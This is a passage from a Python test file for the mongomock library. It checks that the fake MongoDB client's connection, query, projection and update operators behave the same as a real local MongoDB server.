self.assertIsNotNone(conn)
def test__can_create_db_with_path(self):
conn = mongomock.Connection('mongodb://localhost')
self.assertIsNotNone(conn)
class DatabaseGettingTest(TestCase):
def setUp(self):
super(DatabaseGettingTest, self).setUp()
self.conn = mongomock.Connection()
def test__getting_database_via_getattr(self):
db1 = self.conn.some_database_here
db2 = self.conn.some_database_here
self.assertIs(db1, db2)
self.assertIs(db1, self.conn['some_database_here'])
self.assertIsInstance(db1, Database)
self.assertIs(db1.connection, self.conn) # 'connection' is an attribute of pymongo Database
self.assertIs(db2.connection, self.conn)
def test__getting_database_via_getitem(self):
db1 = self.conn['some_database_here']
db2 = self.conn['some_database_here']
self.assertIs(db1, db2)
self.assertIs(db1, self.conn.some_database_here)
self.assertIsInstance(db1, Database)
def test__drop_database(self):
db = self.conn.a
col = db.a
r = col.insert({"aa": "bb"})
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 1)
self.conn.drop_database("a")
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 0)
db = self.conn.a
col = db.a
r = col.insert({"aa": "bb"})
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 1)
self.conn.drop_database(db)
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 0)
def test__alive(self):
self.assertTrue(self.conn.alive())
def test__dereference(self):
db = self.conn.a
colA = db.a
to_insert = {"_id": "a", "aa": "bb"}
r = colA.insert(to_insert)
a = db.dereference(DBRef("a", "a", db.name))
self.assertEqual(to_insert, a)
@skipIf(not _HAVE_PYMONGO, "pymongo not installed")
class _CollectionComparisonTest(TestCase):
"""Compares a fake collection with the real mongo collection implementation via cross-comparison."""
def setUp(self):
super(_CollectionComparisonTest, self).setUp()
self.fake_conn = self._get_mongomock_connection_class()()
self.mongo_conn = self._connect_to_local_mongodb()
self.db_name = "mongomock___testing_db"
self.collection_name = "mongomock___testing_collection"
self.mongo_conn[self.db_name][self.collection_name].remove()
self.cmp = MultiCollection({
"fake" : self.fake_conn[self.db_name][self.collection_name],
"real": self.mongo_conn[self.db_name][self.collection_name],
})
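# Broadly, cmp.do.<method> fans the call out to both backends and returns
# a dict of per-backend results, while cmp.compare.<method> additionally
# asserts that both backends agree (compare_ignore_order ignores document
# ordering); see tests.multicollection for details.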
def _connect_to_local_mongodb(self, num_retries=60):
"Performs retries on connection refused errors (for travis-ci builds)"
connection_class = self._get_real_connection_class()
for retry in range(num_retries):
if retry > 0:
time.sleep(0.5)
try:
return connection_class()
except pymongo.errors.ConnectionFailure as e:
if retry == num_retries - 1:
raise
if "connection refused" not in e.message.lower():
raise
class _MongoClientMixin(object):
def _get_real_connection_class(self):
return PymongoClient
def _get_mongomock_connection_class(self):
return mongomock.MongoClient
class _PymongoConnectionMixin(object):
def _get_real_connection_class(self):
return PymongoConnection
def _get_mongomock_connection_class(self):
return mongomock.Connection
class _CollectionTest(_CollectionComparisonTest):
def test__find_is_empty(self):
self.cmp.do.remove()
self.cmp.compare.find()
def test__inserting(self):
self.cmp.do.remove()
data = {"a" : 1, "b" : 2, "c" : "data"}
self.cmp.do.insert(data)
self.cmp.compare.find() # single document, no need to ignore order
def test__bulk_insert(self):
objs = [{"a" : 2, "b" : {"c" : 3}}, {"c" : 5}, {"d" : 7}]
results_dict = self.cmp.do.insert(objs)
for results in results_dict.values():
self.assertEqual(len(results), len(objs))
self.assertEqual(len(set(results)), len(results), "Returned object ids not unique!")
self.cmp.compare_ignore_order.find()
def test__save(self):
self.cmp.do.insert({"_id" : "b"}) #add an item with a non ObjectId _id first.
self.cmp.do.save({"_id":ObjectId(), "someProp":1}, safe=True)
self.cmp.compare_ignore_order.find()
def test__insert_object_id_as_dict(self):
self.cmp.do.remove()
doc_ids = [
# simple top-level dictionary
{'A': 1},
# dict with value as list
{'A': [1, 2, 3]},
# dict with value as dict
{'A': {'sub': {'subsub': 3}}}
]
for doc_id in doc_ids:
_id = self.cmp.do.insert({'_id': doc_id, 'a': 1})
self.assertEqual(_id['fake'], _id['real'])
self.assertEqual(_id['fake'], doc_id)
self.assertEqual(_id['real'], doc_id)
self.assertEqual(type(_id['fake']), type(_id['real']))
self.cmp.compare.find({'_id': doc_id})
docs = self.cmp.compare.find_one({'_id': doc_id})
self.assertEqual(docs['fake']['_id'], doc_id)
self.assertEqual(docs['real']['_id'], doc_id)
self.cmp.do.remove({'_id': doc_id})
def test__count(self):
self.cmp.compare.count()
self.cmp.do.insert({"a" : 1})
self.cmp.compare.count()
def test__find_one(self):
id1 = self.cmp.do.insert({"_id":"id1", "name" : "new"})
self.cmp.compare.find_one({"_id" : "id1"})
self.cmp.do.insert({"_id":"id2", "name" : "another new"})
self.cmp.compare.find_one({"_id" : "id2"}, {"_id":1})
self.cmp.compare.find_one("id2", {"_id":1})
def test__find_one_no_args(self):
self.cmp.do.insert({"_id": "new_obj", "field": "value"})
self.cmp.compare.find_one()
def test__find_by_attributes(self):
id1 = ObjectId()
self.cmp.do.insert({"_id":id1, "name" : "new"})
self.cmp.do.insert({"name" : "another new"})
self.cmp.compare_ignore_order.find()
self.cmp.compare.find({"_id" : id1})
def test__find_by_document(self):
self.cmp.do.insert({"name" : "new", "doc": {"key": "val"}})
self.cmp.do.insert({"name" : "another new"})
self.cmp.compare_ignore_order.find()
self.cmp.compare.find({"doc": {"key": "val"}})
def test__find_by_attributes_return_fields(self):
id1 = ObjectId()
id2 = ObjectId()
self.cmp.do.insert({"_id":id1, "name" : "new", "someOtherProp":2})
self.cmp.do.insert({"_id":id2, "name" : "another new"})
self.cmp.compare_ignore_order.find({},{"_id":0}) #test exclusion of _id
self.cmp.compare_ignore_order.find({},{"_id":1,"someOtherProp":1}) #test inclusion
self.cmp.compare_ignore_order.find({},{"_id":0,"someOtherProp":0}) #test exclusion
self.cmp.compare_ignore_order.find({},{"_id":0,"someOtherProp":1}) #test mixed _id:0
self.cmp.compare_ignore_order.find({},{"someOtherProp":0}) #test no _id, otherProp:0
self.cmp.compare_ignore_order.find({},{"someOtherProp":1}) #test no _id, otherProp:1
self.cmp.compare.find({"_id" : id1},{"_id":0}) #test exclusion of _id
self.cmp.compare.find({"_id" : id1},{"_id":1,"someOtherProp":1}) #test inclusion
self.cmp.compare.find({"_id" : id1},{"_id":0,"someOtherProp":0}) #test exclusion
self.cmp.compare.find({"_id" : id1},{"_id":0,"someOtherProp":1}) #test mixed _id:0
self.cmp.compare.find({"_id" : id1},{"someOtherProp":0}) #test no _id, otherProp:0
self.cmp.compare.find({"_id" : id1},{"someOtherProp":1}) #test no _id, otherProp:1
def test__find_by_dotted_attributes(self):
"""Test seaching with dot notation."""
green_bowler = {
'name': 'bob',
'hat': {
'color': 'green',
'type': 'bowler'}}
red_bowler = {
'name': 'sam',
'hat': {
'color': 'red',
'type': 'bowler'}}
self.cmp.do.insert(green_bowler)
self.cmp.do.insert(red_bowler)
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({"name" : "sam"})
self.cmp.compare_ignore_order.find({'hat.color': 'green'})
self.cmp.compare_ignore_order.find({'hat.type': 'bowler'})
self.cmp.compare.find({
'hat.color': 'red',
'hat.type': 'bowler'
})
self.cmp.compare.find({
'name': 'bob',
'hat.color': 'red',
'hat.type': 'bowler'
})
self.cmp.compare.find({'hat': 'a hat'})
self.cmp.compare.find({'hat.color.cat': 'red'})
def test__find_empty_array_field(self):
#See #90
self.cmp.do.insert({'array_field' : []})
self.cmp.compare.find({'array_field' : []})
def test__find_non_empty_array_field(self):
#See #90
self.cmp.do.insert({'array_field' : [['abc']]})
self.cmp.do.insert({'array_field' : ['def']})
self.cmp.compare.find({'array_field' : ['abc']})
self.cmp.compare.find({'array_field' : [['abc']]})
self.cmp.compare.find({'array_field' : 'def'})
self.cmp.compare.find({'array_field' : ['def']})
def test__find_by_objectid_in_list(self):
#See #79
self.cmp.do.insert({'_id': 'x', 'rel_id' : [ObjectId('52d669dcad547f059424f783')]})
self.cmp.compare.find({'rel_id':ObjectId('52d669dcad547f059424f783')})
def test__find_subselect_in_list(self):
#See #78
self.cmp.do.insert({'_id': 'some_id', 'a': [ {'b': 1, 'c': 2} ]})
self.cmp.compare.find_one({'a.b': 1})
def test__find_by_regex_object(self):
"""Test searching with regular expression objects."""
bob = {'name': 'bob'}
sam = {'name': 'sam'}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find()
regex = re.compile('bob|sam')
self.cmp.compare_ignore_order.find({"name" : regex})
regex = re.compile('bob|notsam')
self.cmp.compare_ignore_order.find({"name" : regex})
def test__find_by_regex_string(self):
"""Test searching with regular expression string."""
bob = {'name': 'bob'}
sam = {'name': 'sam'}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({"name": {'$regex': 'bob|sam'}})
self.cmp.compare_ignore_order.find({'name': {'$regex': 'bob|notsam'}})
def test__find_in_array_by_regex_object(self):
"""Test searching inside array with regular expression object."""
bob = {'name': 'bob', 'text': ['abcd', 'cde']}
sam = {'name': 'sam', 'text': ['bde']}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
regex = re.compile('^a')
self.cmp.compare_ignore_order.find({"text": regex})
regex = re.compile('e$')
self.cmp.compare_ignore_order.find({"text": regex})
regex = re.compile('bde|cde')
self.cmp.compare_ignore_order.find({"text": regex})
def test__find_in_array_by_regex_string(self):
"""Test searching inside array with regular expression string"""
bob = {'name': 'bob', 'text': ['abcd', 'cde']}
sam = {'name': 'sam', 'text': ['bde']}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find({"text": {'$regex': '^a'}})
self.cmp.compare_ignore_order.find({"text": {'$regex': 'e$'}})
self.cmp.compare_ignore_order.find({"text": {'$regex': 'bcd|cde'}})
def test__find_by_regex_string_on_absent_field_dont_break(self):
"""Test searching on absent field with regular expression string dont break"""
bob = {'name': 'bob'}
sam = {'name': 'sam'}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find({"text": {'$regex': 'bob|sam'}})
def test__find_by_elemMatch(self):
self.cmp.do.insert({"field": [{"a": 1, "b": 2}, {"c": 3, "d": 4}]})
self.cmp.do.insert({"field": [{"a": 1, "b": 4}, {"c": 3, "d": 8}]})
self.cmp.do.insert({"field": "nonlist"})
self.cmp.do.insert({"field": 2})
self.cmp.compare.find({"field": {"$elemMatch": {"b": 1}}})
self.cmp.compare_ignore_order.find({"field": {"$elemMatch": {"a": 1}}})
self.cmp.compare.find({"field": {"$elemMatch": {"b": {"$gt": 3}}}})
def test__find_in_array(self):
self.cmp.do.insert({"field": [{"a": 1, "b": 2}, {"c": 3, "d": 4}]})
self.cmp.compare.find({"field.0.a": 1})
self.cmp.compare.find({"field.0.b": 2})
self.cmp.compare.find({"field.1.c": 3})
self.cmp.compare.find({"field.1.d": 4})
self.cmp.compare.find({"field.0": {"$exists" : True}})
self.cmp.compare.find({"field.0": {"$exists" : False}})
self.cmp.compare.find({"field.0.a": {"$exists" : True}})
self.cmp.compare.find({"field.0.a": {"$exists" : False}})
self.cmp.compare.find({"field.1.a": {"$exists" : True}})
self.cmp.compare.find({"field.1.a": {"$exists" : False}})
self.cmp.compare.find({"field.0.a": {"$exists" : True}, "field.1.a": {"$exists" : False}})
def test__find_notequal(self):
"""Test searching with operators other than equality."""
bob = {'_id': 1, 'name': 'bob'}
sam = {'_id': 2, 'name': 'sam'}
a_goat = {'_id': 3, 'goatness': 'very'}
self.cmp.do.insert([bob, sam, a_goat])
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({'name': {'$ne': 'bob'}})
self.cmp.compare_ignore_order.find({'goatness': {'$ne': 'very'}})
self.cmp.compare_ignore_order.find({'goatness': {'$ne': 'not very'}})
self.cmp.compare_ignore_order.find({'snakeness': {'$ne': 'very'}})
def test__find_none(self):
"""Test searching for None."""
bob = {'_id': 1, 'name': 'bob', 'sheepness':{'sometimes':True}}
sam = {'_id': 2, 'name': 'sam', 'sheepness':{'sometimes':True}}
a_goat = {'_id': 3, 'goatness': 'very', 'sheepness':{}}
self.cmp.do.insert([bob, sam, a_goat])
self.cmp.compare_ignore_order.find({'goatness': None})
self.cmp.compare_ignore_order.find({'sheepness.sometimes': None})
def test__find_not(self):
bob = {'_id': 1, 'name': 'bob'}
sam = {'_id': 2, 'name': 'sam'}
self.cmp.do.insert([bob, sam])
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({'name': {'$not': {'$ne': 'bob'}}})
self.cmp.compare_ignore_order.find({'name': {'$not': {'$ne': 'sam'}}})
self.cmp.compare_ignore_order.find({'name': {'$not': {'$ne': 'dan'}}})
def test__find_compare(self):
self.cmp.do.insert(dict(noise = "longhorn"))
for x in range(10):
self.cmp.do.insert(dict(num = x, sqrd = x * x))
self.cmp.compare_ignore_order.find({'sqrd':{'$lte':4}})
self.cmp.compare_ignore_order.find({'sqrd':{'$lt':4}})
self.cmp.compare_ignore_order.find({'sqrd':{'$gte':64}})
self.cmp.compare_ignore_order.find({'sqrd':{'$gte':25, '$lte':36}})
def test__find_sets(self):
single = 4
even = [2, 4, 6, 8]
prime = [2, 3, 5, 7]
self.cmp.do.insert([
dict(x = single),
dict(x = even),
dict(x = prime)])
self.cmp.compare_ignore_order.find({'x':{'$in':[7, 8]}})
self.cmp.compare_ignore_order.find({'x':{'$in':[4, 5]}})
self.cmp.compare_ignore_order.find({'x':{'$nin':[2, 5]}})
self.cmp.compare_ignore_order.find({'x':{'$all':[2, 5]}})
self.cmp.compare_ignore_order.find({'x':{'$all':[7, 8]}})
self.cmp.compare_ignore_order.find({'x':2})
self.cmp.compare_ignore_order.find({'x':4})
self.cmp.compare_ignore_order.find({'$or':[{'x':4}, {'x':2}]})
self.cmp.compare_ignore_order.find({'$or':[{'x':4}, {'x':7}]})
self.cmp.compare_ignore_order.find({'$and':[{'x':2}, {'x':7}]})
def test__find_and_modify_remove(self):
self.cmp.do.insert([{"a": x} for x in range(10)])
self.cmp.do.find_and_modify({"a": 2}, remove=True)
self.cmp.compare_ignore_order.find()
def test__find_sort_list(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort = [("a", 1), ("b", -1)])
self.cmp.compare.find(sort = [("b", 1), ("a", -1)])
self.cmp.compare.find(sort = [("b", 1), ("a", -1), ("c", 1)])
def test__find_sort_list_empty_order(self):
self.cmp.do.remove()
for data in ({"a": 1},
{"a": 2, "b": -2},
{"a": 3, "b": 4}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort=[("b", 1)])
self.cmp.compare.find(sort=[("b", -1)])
def test__find_sort_list_nested_doc(self):
self.cmp.do.remove()
for data in ({"root": {"a" : 1, "b" : 3, "c" : "data1"}},
{"root": {"a" : 2, "b" : 2, "c" : "data3"}},
{"root": {"a" : 3, "b" : 1, "c" : "data2"}}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort = [("root.a", 1), ("root.b", -1)])
self.cmp.compare.find(sort = [("root.b", 1), ("root.a", -1)])
self.cmp.compare.find(sort = [("root.b", 1), ("root.a", -1), ("root.c", 1)])
def test__find_sort_list_nested_list(self):
self.cmp.do.remove()
for data in ({"root": [{"a" : 1, "b" : 3, "c" : "data1"}]},
{"root": [{"a" : 2, "b" : 2, "c" : "data3"}]},
{"root": [{"a" : 3, "b" : 1, "c" : "data2"}]}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort = [("root.0.a", 1), ("root.0.b", -1)])
self.cmp.compare.find(sort = [("root.0.b", 1), ("root.0.a", -1)])
self.cmp.compare.find(sort = [("root.0.b", 1), ("root.0.a", -1), ("root.0.c", 1)])
def test__find_limit(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare.find(limit=2, sort = [("a", 1), ("b", -1)])
self.cmp.compare.find(limit=0, sort = [("a", 1), ("b", -1)]) #pymongo limit defaults to 0, returning everything
def test__as_class(self):
class MyDict(dict): pass
self.cmp.do.remove()
self.cmp.do.insert({"a": 1, "b": {"ba": 3, "bb": 4, "bc": [ {"bca": 5 } ] }})
self.cmp.compare.find({}, as_class=MyDict)
self.cmp.compare.find({"a": 1}, as_class=MyDict)
def test__return_only_selected_fields(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = ['type'])
def test__return_only_selected_fields_no_id(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'type' : 1, '_id' : 0})
def test__return_only_selected_fields_nested_field_found(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = ['properties.type'])
def test__return_only_selected_fields_nested_field_not_found(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = ['properties.color'])
def test__return_only_selected_fields_nested_field_found_no_id(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.type' : 1, '_id' : 0})
def test__return_only_selected_fields_nested_field_not_found_no_id(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.color' : 1, '_id' : 0})
def test__exclude_selected_fields(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'type' : 0})
def test__exclude_selected_fields_including_id(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'type' : 0, '_id' : 0})
def test__exclude_all_fields_including_id(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll'})
self.cmp.compare.find({'name':'Chucky'}, fields = {'type' : 0, '_id' : 0, 'name' : 0})
def test__exclude_selected_nested_fields(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.type' : 0})
def test__exclude_all_selected_nested_fields(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.type' : 0, 'properties.model' : 0})
def test__default_fields_to_id_if_empty(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = [])
def test__remove(self):
"""Test the remove method."""
self.cmp.do.insert({"value" : 1})
self.cmp.compare_ignore_order.find()
self.cmp.do.remove()
self.cmp.compare.find()
self.cmp.do.insert([
{'name': 'bob'},
{'name': 'sam'},
])
self.cmp.compare_ignore_order.find()
self.cmp.do.remove({'name': 'bob'})
self.cmp.compare_ignore_order.find()
self.cmp.do.remove({'name': 'notsam'})
self.cmp.compare.find()
self.cmp.do.remove({'name': 'sam'})
self.cmp.compare.find()
def test__update(self):
doc = {"a" : 1}
self.cmp.do.insert(doc)
new_document = {"new_attr" : 2}
self.cmp.do.update({"a" : 1}, new_document)
self.cmp.compare_ignore_order.find()
def test__set(self):
"""Tests calling update with $set members."""
self.cmp.do.update({'_id':42}, {'$set': {'some': 'thing'}}, upsert=True)
self.cmp.compare.find({'_id' : 42})
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$set': {'hat': 'green'}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$set': {'hat': 'red'}})
self.cmp.compare.find({'name': 'bob'})
def test__unset(self):
"""Tests calling update with $set members."""
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': 0}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': 1}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': ""}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': True}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': False}})
self.cmp.compare.find({'name' : 'bob'})
def test__set_upsert(self):
self.cmp.do.remove()
self.cmp.do.update({"name": "bob"}, {"$set": {"age": 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({"name": "alice"}, {"$set": {"age": 1}}, True)
self.cmp.compare_ignore_order.find()
def test__set_subdocuments(self):
"""Tests using $set for setting subdocument fields"""
if isinstance(self, _MongoClientMixin):
self.skipTest("MongoClient does not allow setting subdocuments on existing non-documents")
self.cmp.do.insert({'name': 'bob', 'data1': 1, 'subdocument': {'a': {'b': {'c': 20}}}})
self.cmp.do.update({'name': 'bob'}, {'$set': {'data1.field1': 11}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$set': {'data2.field1': 21}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$set': {'subdocument.a.b': 21}})
self.cmp.compare.find()
def test__set_subdocuments_positional(self):
self.cmp.do.insert({'name': 'bob', 'subdocs': [
{'id': 1, 'name': 'foo'},
{'id': 2, 'name': 'bar'}
]})
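# The positional operator '$' resolves to the first array element matched
# by the query, here the subdocument with id 2.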
self.cmp.do.update({'name': 'bob', 'subdocs.id': 2},
{'$set': {'subdocs.$': {'id': 3, 'name': 'baz'}}})
self.cmp.compare.find()
def test__inc(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$inc': {'count':1}})
self.cmp.compare.find({'name': 'bob'})
def test__inc_upsert(self):
self.cmp.do.remove()
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$inc': {'count':1}}, True)
self.cmp.compare.find({'name': 'bob'})
def test__inc_subdocument(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': {'age': 0}})
self.cmp.do.update({'name':'bob'}, {'$inc': {'data.age': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name':'bob'}, {'$inc': {'data.age2': 1}})
self.cmp.compare.find()
def test__inc_subdocument_positional(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': [{'age': 0}, {'age': 1}]})
self.cmp.do.update({'name': 'bob', 'data': {'$elemMatch': {'age': 0}}},
{'$inc': {'data.$.age': 1}})
self.cmp.compare.find()
def test__setOnInsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'age': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'age': 1}})
self.cmp.compare.find()
def test__setOnInsert_upsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'age': 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'age': 1}}, True)
self.cmp.compare.find()
def test__setOnInsert_subdocument(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': {'age': 0}})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age1': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'data.age': 1}})
self.cmp.compare.find()
def test__setOnInsert_subdocument_upsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': {'age': 0}})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age': 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age1': 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'data.age': 1}}, True)
self.cmp.compare.find()
def test__setOnInsert_subdocument_positional(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': [{'age': 0}, {'age': 1}]})
self.cmp.do.update({'name': 'bob', 'data': {'$elemMatch': {'age': 0}}},
{'$setOnInsert': {'data.$.age': 1}})
self.cmp.compare.find()
def test__setOnInsert_subdocument_positional_upsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': [{'age': 0}, {'age': 1}]})
self.cmp.do.update({'name': 'bob', 'data': {'$elemMatch': {'age': 0}}},
{'$setOnInsert': {'data.$.age': 1}}, True)
self.cmp.compare.find()
def test__addToSet(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'hat':'green'}})
self.cmp.compare.find({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name': 'bob'}, {'$addToSet': {'hat':'tall'}})
self.cmp.compare.find({'name': 'bob'})
def test__addToSet_nested(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'hat.color':'green'}})
self.cmp.compare.find({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name': 'bob'}, {'$addToSet': {'hat.color':'tall'}})
self.cmp.compare.find({'name': 'bob'})
def test__addToSet_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'hat': {'$each' : ['green', 'yellow']}}})
self.cmp.compare.find({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$addToSet': {'shirt.color': {'$each' : ['green', 'yellow']}}})
self.cmp.compare.find({'name': 'bob'})
def test__pull(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$pull': {'hat': 'green'}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall']})
self.cmp.do.update({'name': 'bob'}, {'$pull': {'hat': 'green'}})
self.cmp.compare.find({'name': 'bob'})
def test__pull_query(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'size': 5}, {'size': 10}]})
self.cmp.do.update({'name': 'bob'}, {'$pull': {'hat': {'size': {'$gt': 6}}}})
self.cmp.compare.find({'name': 'bob'})
def test__pull_nested_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': [{'size': 'L', 'quantity': 3}, {'size': 'XL', 'quantity': 4}], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': [{'size': 'S', 'quantity': 10}, {'size': 'L', 'quantity': 5}], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$pull': {'hat.$.sizes': {'size': 'L'}}})
self.cmp.compare.find({'name': 'bob'})
def test__pull_nested_list(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': ['L', 'XL']}, {'name': 'cap', 'sizes': ['S', 'L']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$pull': {'hat.$.sizes': 'XL'}})
self.cmp.compare.find({'name': 'bob'})
def test__pullAll(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat': ['green']}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat': ['green', 'blue']}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall', 'blue']})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat': ['green']}})
self.cmp.compare.find({'name': 'bob'})
def test__pullAll_nested_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {'properties' : {'sizes': ['M', 'L', 'XL']}}})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat.properties.sizes': ['M']}})
self.cmp.compare.find({'name': 'bob'})
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {'properties' : {'sizes': ['M', 'L', 'XL']}}})
self.cmp.do.update({'name': 'bob'}, {'$pullAll': {'hat.properties.sizes': ['M', 'L']}})
self.cmp.compare.find({'name': 'bob'})
def test__push(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall']})
